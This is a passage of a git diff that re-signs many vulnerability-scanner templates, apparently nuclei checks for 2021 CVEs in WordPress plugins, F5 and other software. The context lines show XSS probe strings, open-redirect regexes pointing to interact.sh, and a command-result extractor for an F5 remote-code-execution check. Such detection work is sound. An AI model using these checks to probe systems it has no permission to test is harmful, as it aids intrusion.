+51,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4b0a00483046022100fe9c76568f5c17d3ad5ca41852a87aca6cd7e386594a11c8e7cebc5b7d8a4c80022100d022d0ad67a7f96e9fbbfa6a04d805a775c312dab24b5b5e7ffa55a9f3751390:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220663af91463a6a4ca2abb22b5ef2800bcedf617cefdf7095c37774a8bec69c3de022100fc1cc469236ab053e23f1f424dd78b36b008320e5044ac7b29e9cc6b6d58a224:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-22911.yaml b/http/cves/2021/CVE-2021-22911.yaml index 2946efdf9c..15294b2567 100644 --- a/http/cves/2021/CVE-2021-22911.yaml +++ b/http/cves/2021/CVE-2021-22911.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202ceec4399b237de979a8a362eb44fad120bd7bb964bb3fcdbb6d6a01e6557c52022100894d28662f6e764af7d0e5fca1e84474779041d8ac3df6fa020f407efa627421:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206afa99df22230016448a0b9e4364d9a635e1c8fd7cfd72660a762d448cbd4f5d0220095bfe68aa3b132862d07e4ef9a816e4cb65bbaa068d0625b536a97b43d87319:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-22986.yaml b/http/cves/2021/CVE-2021-22986.yaml index 3156921190..03c484154c 100644 --- a/http/cves/2021/CVE-2021-22986.yaml +++ b/http/cves/2021/CVE-2021-22986.yaml @@ -75,4 +75,4 @@ http: regex: - "\"commandResult\":\"(.*)\"" part: body -# digest: 4a0a0047304502205b6103e9c4287d5da718fb79ec432f89995dbdb62f4452ca4f0b7984d1c4bb11022100ece1ce92a2ba853152334fb7ed172e4d6214d384761a67459317cf8e857e8128:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022033f4b6a3a38e1e220d5ead60be586ddc4599d92ea8b4d4398d594463575ed237022056dd65d7e05c3942adfaaf7a94a5024388f73303e77ac7c923e5eb8feda94cb3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24145.yaml b/http/cves/2021/CVE-2021-24145.yaml index 686929fe9e..a037fd7015 100644 --- a/http/cves/2021/CVE-2021-24145.yaml +++ b/http/cves/2021/CVE-2021-24145.yaml @@ -68,4 +68,4 @@ http: part: body_3 words: - '{{md5(string)}}' -# digest: 4a0a00473045022100eb908dd55285a9d68012b0deb023c829756d657d18a89b83a500e349b9414fdc0220797b8bd8acbf0f11d56926e26306dcaaf73faad50e06780881b5dcea9c5251ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008f0ce98ee970e43771441d34c4ddb6a936223550c6a25e53079a2cbb79b11926022100be4c7dee887a3da101404a2f12a35b8ef8c5f34d7396462b88f9031f53e29f09:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24165.yaml b/http/cves/2021/CVE-2021-24165.yaml index f94ba1a63c..f4dfbc1a06 100644 --- a/http/cves/2021/CVE-2021-24165.yaml +++ b/http/cves/2021/CVE-2021-24165.yaml @@ -55,4 +55,4 @@ http: - 'status_code_2 == 302' - "contains(header_2, 'Location: https://interact.sh?client_id=1')" condition: and -# digest: 4a0a00473045022100af649c1abdb63fdedcc1e46e68a77c520ee591eac3e400bbaa84654855512c8902200eb0a2419a23469cfae750f62bd2f38b597658927a13e0dc3aabafb3c49025dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100dbe91ea50dd379c515d3eee6699a845d148a111391c7303db2a193b9eda920ea022061e3ec8779c027810f1f1f1cba44c0df3db63590a5d0808e1bb4ee5e8ee9f522:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24169.yaml b/http/cves/2021/CVE-2021-24169.yaml index b4634e5e00..cd4d59025e 100644 --- a/http/cves/2021/CVE-2021-24169.yaml +++ b/http/cves/2021/CVE-2021-24169.yaml @@ -50,4 +50,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "woo-order-export-lite")' condition: and -# digest: 4b0a004830460221009d6516913d6729de70ed63ad691d2279e02dccb63785273ce41ad95627d09b600221008c2ad831a4ea154a285ac6cc8782e79d2963279dd7368f98298158f17ca2bedf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220088e88fce003d52c31b00f5dfee3fd31732ed9cf84e53ebd02d783bbd5e33f9e02204ea3fe03c47fafef315a0010ecf459941a1c5599bcbc85eb3fa7eb5e564d56c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24214.yaml b/http/cves/2021/CVE-2021-24214.yaml index 539210ccab..04a74913bc 100644 --- a/http/cves/2021/CVE-2021-24214.yaml +++ b/http/cves/2021/CVE-2021-24214.yaml @@ -65,4 +65,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206fc7f4432dfb77192a80cf4d997a216a19b49797038590bc872b29213ac7583702203b5e05a054ce8e225e79baf93062589c32a2ca5381d2dbe7b305083323a93600:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f2a3d9930e0fde5f6bcb71f2c59eaa85e3572ed307c67a7640172e0be08f3d120220271fec82e3f65b2c757047deeacf4c68ee53c11fa6c9a162278ebe28b34d057e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24215.yaml b/http/cves/2021/CVE-2021-24215.yaml index 6823dc6620..6d571939e6 100644 --- a/http/cves/2021/CVE-2021-24215.yaml +++ b/http/cves/2021/CVE-2021-24215.yaml @@ -51,4 +51,4 @@ http: - 'contains(content_type_2, "text/html")' - 'contains(body_2, "This page allows direct access to your site settings") && contains(body_2, "Controlled Admin Access")' condition: and -# digest: 4a0a00473045022100ce8b5d92f92657b495f0d0e99056e7b9bb7f133c8b77529959e1c2851b9051a9022055704998cb439b67c0756f7a39ac3850f241afa4666f6b8ded396450dcb59f59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b6ba39eb8c10b2c00f154fb9e06a3f16a51818ba25a713f46b224ae78b7b08e3022100f9a70545d94a0a5654a19de02b7fd4bd02a03739783bf7ef65553e5d9e73f069:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24227.yaml b/http/cves/2021/CVE-2021-24227.yaml index 097ff33b6d..94c9ba3028 100644 --- a/http/cves/2021/CVE-2021-24227.yaml +++ b/http/cves/2021/CVE-2021-24227.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e010a58406c9d302cf5a336366e3e9bd83259ab417eaabcc9e9e7aad71f7379c0220646868c3ac63cba246f32a22e9fa9ce7ad8df8bc22a398e46198334eddbd7c4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d715a8e520cf5727c132342f09ac7b40097daca062029a9cb8f6b7bf2bd6c5ba0220142bb7c95232cdbb5e7fc81003752a1bd8d72ab9bb20e42fa86153d12f216f67:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24235.yaml b/http/cves/2021/CVE-2021-24235.yaml index 7e97211902..8f9371ba65 100644 --- a/http/cves/2021/CVE-2021-24235.yaml +++ b/http/cves/2021/CVE-2021-24235.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402207172378464726e156cb63127750d8141c27c54fcca61e8ac543695934d8177cc0220120dd46612aca278b023793c297b93335bd16a9ce26edb7eaf12e9dd092e5052:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009d23108ba1cdd72e6bfe6cfe6e507299b767640b3a46324e24d3a1cd1ca292ee022060651971ff50dd0882e7ba4d6d58d652b8f0f4674786a748317450e52b2c4830:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24237.yaml b/http/cves/2021/CVE-2021-24237.yaml index c0e7dbf23a..7f407f270c 100644 --- a/http/cves/2021/CVE-2021-24237.yaml +++ b/http/cves/2021/CVE-2021-24237.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204b9bcf654a4fdbd7dd7b23c12beaa5286360f594247e37850e45dce56acfa10f02210098b0b6add57f62bf6677700e736e62b4182e01c7236ca9127ab47e2746206de9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201fc726e55c9bf9929e37f6006909fbb32a677d575807c2111365c7be4477fc980221009cb351f18b9772924ba5afcb3b1bfb45b790ff5d8efbba818699450a917da774:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24239.yaml b/http/cves/2021/CVE-2021-24239.yaml index ead9379a4d..2cb93cb77a 100644 --- a/http/cves/2021/CVE-2021-24239.yaml +++ b/http/cves/2021/CVE-2021-24239.yaml @@ -54,4 +54,4 @@ http: - 'status_code == 200' - 'contains(body, "") && contains(body, "invitaion-code-table")' condition: and -# digest: 490a0046304402201ee2a4557fba7636af6a7f66ace986f366c1b8b98975c008971287a6b7b66d2802204e5cace0f361c36db2bc2e80e1931aba048e7cf304d3668b487400cad63f4773:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b99a39f4abdc6dca07eb7f5ab3dd7fe8111515935493a27d4ee44ae0d090e72d022100a5016274628bb830de4aa3f88794468720b50096965f9e1b4df30029b75c3885:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24275.yaml b/http/cves/2021/CVE-2021-24275.yaml index 490c15abcd..c3274e5f2b 100644 --- a/http/cves/2021/CVE-2021-24275.yaml +++ b/http/cves/2021/CVE-2021-24275.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202e8b612008e7b0431de014a13bfb6d727ae9e6d71ea87d4d29754936012f118e022100bb024808d77aed7e62c623b62b8e653220673c8f814fb7575dfa7f7df1056248:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201e2ceeffc6debc4a9f2bcab33c299f89ea8f059834bcadd14ed1ce12254f7638022100e939c158d51778be923e5bda4ff02bdb8fb85e3f133afd6508d7c1c9547eb485:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24276.yaml b/http/cves/2021/CVE-2021-24276.yaml index 008efe6cda..0bd7919fd2 100644 --- a/http/cves/2021/CVE-2021-24276.yaml +++ b/http/cves/2021/CVE-2021-24276.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ccf19553c3785450c335d57b9e48236787603b65f193d92a7aa7845a9f18ea87022100bfc9570db36ebaebe97547ffa74f02f047c2ae49cca8f2653f2c9dbf1e5bab3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100dc5ae696a3713e5efe99907c2c5316b86c4f55c217dfe61338fc36f6c3879dc002204f97750378dd8bb6166a795ddb6f7f0b7013314c8985d1232d49854a8f34f942:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24278.yaml b/http/cves/2021/CVE-2021-24278.yaml index 24c2b6839f..be2161f201 100644 --- a/http/cves/2021/CVE-2021-24278.yaml +++ b/http/cves/2021/CVE-2021-24278.yaml @@ -58,4 +58,4 @@ http: regex: - '"nonce":"[a-f0-9]+"' part: body -# digest: 4b0a00483046022100d9abb764ee6563027af072cc23d4c9c16f80410112aba32996d15ad9d82c5a5a022100e439314dc9a6527a0d80b588b231ae631ee122f0d97542b41b800ffed7a3f51f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c8fac8fdf71326555a5486e0e8e4cee24f7c0935a646560cea1647dc070116c4022032a19f5428b2a56be9a82a4133abf280624b3aaf97b89bfed02d8b4f37761fe4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24285.yaml b/http/cves/2021/CVE-2021-24285.yaml index 316e6675b6..db70d6ff1d 100644 --- a/http/cves/2021/CVE-2021-24285.yaml +++ b/http/cves/2021/CVE-2021-24285.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220172be49164feec344dfa1d49f0cdf335917a5d2a75846fce80ea6e1bbe5b7bee02210089fab324ff44731061d8adcd715f206c9c089bd9a7fe64fea86c8c3aedf97623:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ba643fedbb91f2466bb237a3b7bbbdd45946e6b3bfd4091c04289cca1bd8eb99022100c750742c674d9cc5638542af36f2a8e66e9f8b5c6cf37ada103caf15f2183444:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24286.yaml b/http/cves/2021/CVE-2021-24286.yaml index f42407ae19..9a9025a2b6 100644 --- a/http/cves/2021/CVE-2021-24286.yaml +++ b/http/cves/2021/CVE-2021-24286.yaml @@ -48,4 +48,4 @@ http: - 'contains(body_2, "alert%28document.domain%29") && contains(body_2, "Moove redirect 404")' - 'status_code_2 == 200' condition: and -# digest: 4b0a004830460221009c8a16dca3ea8098cdf84c96ec66655812cb68fb55b9e286f7fe420d60faa9110221009d1a382904cfdd55a6f49320a79ef9b8f3b938ad8bc9db2d8b1fadfd597b6e3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e13cf44f9820ec6052cab59923d3de1acb5b79d5e76496d09430617eb597685102210089949e4eb6ccb5c5d6c11c6411dde8a2652b795b441adfcbd1f4c9ad1a1add36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24287.yaml b/http/cves/2021/CVE-2021-24287.yaml index e7c9fbea8e..b8cac92ac4 100644 --- a/http/cves/2021/CVE-2021-24287.yaml +++ b/http/cves/2021/CVE-2021-24287.yaml @@ -50,4 +50,4 @@ http: - 'contains(body_2, "alert(document.domain)")' - 'contains(body_2, "Set up the taxonomies")' condition: and -# digest: 490a004630440220331de77e11f4fd8c6eb5947ea08b967c217e35cecc249be01ac24e264c67cb8402205f29a68c7018c29021c2f9a42175170a1c54ed085d505a1ed2d012236cac7ec8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202036a3f93bdb549d836947fffa1278b976413fdd5a88b48901098c1d739b84cd02205f829905ae6e30de9cfeff518f4631b04feae75749c3f90a6b7b8cd5d89f1f63:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24288.yaml b/http/cves/2021/CVE-2021-24288.yaml index 0ec9ba6c6a..7f9ac18834 100644 --- a/http/cves/2021/CVE-2021-24288.yaml +++ b/http/cves/2021/CVE-2021-24288.yaml @@ -39,4 +39,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4a0a00473045022100dea3cbf54f50326db8a7cbe9c797a7d01e224af22ec2b849fde4047988e95b50022052cd3007e67dc0c21a9cb9d2bb25fce7cf31bb2d63ecfe1d826358cfb03c9983:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009abf7c72e4673c71efb3164fa015476a4a3eac0974adc0c3c8a43d3f5674c711022100eb04bf1f3ac4b6c03bfb650e38cce35ea6e62b2debd446add9967fe56a7bbdbf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24291.yaml b/http/cves/2021/CVE-2021-24291.yaml index 3d9a76faf9..9cfe43d4db 100644 --- a/http/cves/2021/CVE-2021-24291.yaml +++ b/http/cves/2021/CVE-2021-24291.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220530060b9231214c3948331f2fc9151166f95e489be988572b86a607150d1ef12022100aacb96e91813386ae60992bae5c87ad91e0ca09b7a1801f42b2d7cdf30950423:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203e2a4280ee0651e5647945e4903da98fa98c222ddd7b9235a6d9438e3485841402206d0d38add1a01e0032859c32ec3152b0a8ceaece887c99aa97f955a93b804c0d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24316.yaml b/http/cves/2021/CVE-2021-24316.yaml index ae31119e67..2c9947ee62 100644 --- a/http/cves/2021/CVE-2021-24316.yaml +++ b/http/cves/2021/CVE-2021-24316.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200ae8fcc2d6914ccc76596fda76037f35a2be4f783e8235640658b1ddcca4fd0d02204cfde07015adbd07b9e358a136ff26a457fd6c72dea188f3957fcd0e55048236:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202de8ec115ae8a3bb318422ecf0582ed6dbda74e0aec7858ba6c8616ff657977a02207416f4b88d848c9ed14c944616a1822b061cddd6abfb08293deb1987e14ff9a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24320.yaml b/http/cves/2021/CVE-2021-24320.yaml index da9d500fb7..6b4aa6e017 100644 --- a/http/cves/2021/CVE-2021-24320.yaml +++ b/http/cves/2021/CVE-2021-24320.yaml @@ -65,4 +65,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221008e15f1d12a3c256545b2354d77805fba07dab4bd51e44c3fe7091d44faae1335022100a6fb26884ef13ceb3a1c3a2e828fd31823f1db0983fe693cbcfc5123cb4419ba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022014722415f9ae063b808bcd4ac28d7a9b396691db69e28476da39b6334b500023022100e8bd3f1af2ba25ea96591e2a83134dcc3dd5f659df9340e6bd61b8e03c14c069:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24340.yaml b/http/cves/2021/CVE-2021-24340.yaml index 246f436182..465c664191 100644 --- a/http/cves/2021/CVE-2021-24340.yaml +++ b/http/cves/2021/CVE-2021-24340.yaml @@ -56,4 +56,4 @@ http: - 'status_code_2 == 500' - 'contains(body_2, ">WordPress › Error<") && contains(body_2, ">Your request is not valid.<")' condition: and -# digest: 4a0a004730450220183a03e620c9440c35b2d6073fdd8fd311debe078d409ad5ab0ed7b02f68cd81022100e1fdb85b5428e6dd55de5a162d0347cdc3c6ae247a909958c290934224079b62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205dcef0e1060bf6410f8ccc51b6dc60108a61f504af5607a66e0bfd3cb395781e022018998b666ed53f82c15af12788cdc956d84f2304b15fd173d3be1f38b1a19c0a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24347.yaml b/http/cves/2021/CVE-2021-24347.yaml index 6b88d58a1d..3a7c65191f 100644 --- a/http/cves/2021/CVE-2021-24347.yaml +++ b/http/cves/2021/CVE-2021-24347.yaml @@ -102,4 +102,4 @@ http: regex: - name="cdm_upload_file_field" value="([0-9a-zA-Z]+)" internal: true -# digest: 4a0a004730450221008132184d590749df7f2b7f6325397ef834ce52492895d770004a69abee5c6028022044920ae885c48f6bcd07ab01726483d065fc52a02202fd0d7e1a69c1ea960f79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210085d38a81c8b989c8722beb364cf0c9ec86d6b33d5a29b2bb78551d28536a08db022100eb0b52da08f13e8b8eebf84715feb0dafd2bd2b5fdc3ffdc9a2f2e0f8c713b85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24351.yaml b/http/cves/2021/CVE-2021-24351.yaml index e4fea31b66..fba6741368 100644 --- a/http/cves/2021/CVE-2021-24351.yaml +++ b/http/cves/2021/CVE-2021-24351.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b0eaf8ef2a2056147b9485f4d77a8844b65eac6cfb6216d78f3290313d7a3c0d0221008186ee4d441d90db81008c8d1396a431a4347efa93ae3069c01eab7a2b1ee18f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220760ed06432bf30cbd5df6d335162c9e24a7e995f5cae884aeedf3bc4a2dfd1bf02204bc667f8728c778fc9ff0248f2f1d49a60bbb6e943d7116dbbfffe8f515289c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24358.yaml b/http/cves/2021/CVE-2021-24358.yaml index c0a2c61d5f..1c43546ba3 100644 --- a/http/cves/2021/CVE-2021-24358.yaml +++ b/http/cves/2021/CVE-2021-24358.yaml @@ -61,4 +61,4 @@ http: - 'ion: https:\/\/[a-z0-9.]+\/author\/([a-z]+)\/' internal: true part: header -# digest: 4b0a00483046022100ae75d3fbb605efbbfe6ae9894ef9afa56a51b9d9be1cc299773a592741ef9fcf022100cd029992f746d9d353355c06400c8a7246c94a86df04621081ef99421a51cd76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022011ea822f43460b23dc2579808ea35fa59b082ed0b25017fd169a9638273ad5fb022100dfa29ed479fdfdc49a6e3aaca996b48c9feebacfe86b4f1e3dc126e2dca9bb87:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24409.yaml b/http/cves/2021/CVE-2021-24409.yaml index ce95bef48b..01c948f9f1 100644 --- a/http/cves/2021/CVE-2021-24409.yaml +++ b/http/cves/2021/CVE-2021-24409.yaml @@ -51,4 +51,4 @@ http: - 'contains(body_2, "Leave A Review?")' - 'contains(body_2, "onanimationend=alert(document.domain)")' condition: and -# digest: 4b0a00483046022100b3a272b73b275993030f6cb84ddacf46958fd51cea8bbee3478f27a93413c9a9022100a4d5c436e634b4c03e12c36e668f37d9d2b56c11fc8527edf562c96413535d16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f3b6393f38c382ea7ce0abcf70deef44f182fcd4065ccf2fad781fc835d80a0f0221009809a88c0d01b87cd8335a7a367389737021ea22bbaca6405ab5864aca886c85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24435.yaml b/http/cves/2021/CVE-2021-24435.yaml index f224704d68..864a6f9375 100644 --- a/http/cves/2021/CVE-2021-24435.yaml +++ b/http/cves/2021/CVE-2021-24435.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b274a3153b4cde29ead1240a44502cbd6ca417a12104f68f3e81fc354ff0091b022100fa5610d0c8faa4d8504b66848c83c4d689be8c8c917cac6db669e55696f38ecc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008da5c58728595669ead26be4769eeb1df23297dd017f133391e30af74448ead8022002efbda42f14733af66e2bc5905ff385bc483741dc65089be4c32f87fe01ac82:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24442.yaml b/http/cves/2021/CVE-2021-24442.yaml index 56fe01869c..ef5943bbeb 100644 --- a/http/cves/2021/CVE-2021-24442.yaml +++ b/http/cves/2021/CVE-2021-24442.yaml @@ -48,4 +48,4 @@ http: - 'status_code == 200' - 'contains_all(body, "{\"answer_name", "vote\":")' condition: and -# digest: 4a0a0047304502200a19043d7f0d2e1b48cc9b1ae8f2e1b84ac62c18df00ab187a07eb5f98ba5f17022100a48e6060c3f50a27b56f3505e1fa0b6480e1059eda4dcb34d325573dcb4743cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220400950d0fa75587a1672ab2651c5f2359b6e2e562a8e976b14a0c3df14ea75af022100d7140a8c7c94b358b4ce33d56a2ab711aabe08fd44109c2983364d553c4527e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24472.yaml b/http/cves/2021/CVE-2021-24472.yaml index 656326e427..1f57b5be55 100644 --- a/http/cves/2021/CVE-2021-24472.yaml +++ b/http/cves/2021/CVE-2021-24472.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022057be194a5808d00466ff72b9e508174e10f7370ed4dd276f27c062b8d8bc93c4022100a1fa11246e181d2b40cae6ef33377d5fb321750789d7bcc03b09c87b93238a16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bb4dede60cbd650ce97bfda0fa91b7f8370e06af577abd3c80b68b8b317218b002201e412b7c8e92f85dcbe03843c685bd8b1901b503ba7e1205e582a81f7966aeef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24495.yaml b/http/cves/2021/CVE-2021-24495.yaml index 4369c05bbc..d65d921b5b 100644 --- a/http/cves/2021/CVE-2021-24495.yaml +++ b/http/cves/2021/CVE-2021-24495.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ad62d472ea3292c9468e6cb2fd946e3f2d275d92502da6f4c39ce040ba978b140220053b172dcde7c61ebe9b7ed6248cd910e232bb089c8707aaaedb6a4bc7f52f8e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d42d40aa6ef4a884d3084a8e50e0ee71972fde405b612c457030f7b4fbd83a0202202f0373f878a48a8d60e2ba1fc2b19de2a80adfe86236c8f906bb74d7f01e720d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24498.yaml b/http/cves/2021/CVE-2021-24498.yaml index 1b955e4576..9d4e5d405d 100644 --- a/http/cves/2021/CVE-2021-24498.yaml +++ b/http/cves/2021/CVE-2021-24498.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022053f7aa1da929328cbebc337daa2af812dc588d126578f5cfae4ff8b30fcc5e2702203cec9721837ea172c547273360bc6802dc4fae7d289079e5b59e5f73b956c4f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ffc5f74510cc804d76491c96c3a78a78f0796e6b5950df9ed984c11478e28e0f02206575b9f86340e23cea7171330bc02d9c9865ed226f96c3cba038187054958d85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24510.yaml b/http/cves/2021/CVE-2021-24510.yaml index 5eddc3de2b..3d9f11bd99 100644 --- a/http/cves/2021/CVE-2021-24510.yaml +++ b/http/cves/2021/CVE-2021-24510.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022058dc77da6c8d24825cb047a3e8c3ebf81009329a2e76774ba7c0057029c91916022100e648680bb6ce6d636b0d7ec9f0cd812776cc4617bf039cc8bac7d00b1ae026d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c5c9ef37f26b09302f5f83979a9d3eb5458a27288f073c0031fa9d5478531155022100cce0f1e12c98cb812f5eadba2970cf1015bc99efa6bcd9ae779ac28418e0be87:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24554.yaml b/http/cves/2021/CVE-2021-24554.yaml index aae98ac483..42fafa94e4 100644 --- a/http/cves/2021/CVE-2021-24554.yaml +++ b/http/cves/2021/CVE-2021-24554.yaml @@ -53,4 +53,4 @@ http: - 'contains(content_type_2, "text/html")' - 'contains(body_2, "paytm-settings_page_wp_paytm_donation")' condition: and -# digest: 490a0046304402206761ba0bbf5025dd6acebce6ae4c00348e7a0c42d2dabe4f89025ddf1f64856802200b643eb17601d207edb76a789e0506dab04b0d1e4d81a8cef2106f21c6234377:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b092e95ed6c8648f9314bf91ab75d65da7ed441e0f53438cb2f29fef0b3fc15d022100ad4c2f079591cb0fd9d7d2c4072ef01d722fee1c9c8e7385c0669f87453932c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24627.yaml b/http/cves/2021/CVE-2021-24627.yaml index 83bf3b7bc4..ccd8d8b750 100644 --- a/http/cves/2021/CVE-2021-24627.yaml +++ b/http/cves/2021/CVE-2021-24627.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100bdb4a94865f92c4bfb19042de1f21fae7eebca1adb86abff97ff76e2b8a8343002202507f1d079f5aad3bf0c38a5bed17afdc4c7d599611392cc29897c83b6be1425:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008622e207c9f0ca1114e5c6a581d6366e8af3b5123dcf60107685cf3a2fc5e87d02206a27d7c55a4b02d222f9740a6009fdc11aa7d94d4b5eba63538b574577c9d148:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24647.yaml b/http/cves/2021/CVE-2021-24647.yaml index cd5ba49a13..6479c8b93e 100644 --- a/http/cves/2021/CVE-2021-24647.yaml +++ b/http/cves/2021/CVE-2021-24647.yaml @@ -52,4 +52,4 @@ http: - 'contains(body_1, "pieregister")' - 'contains(body_3, "Username") && contains(body_3, "email-description")' condition: and -# 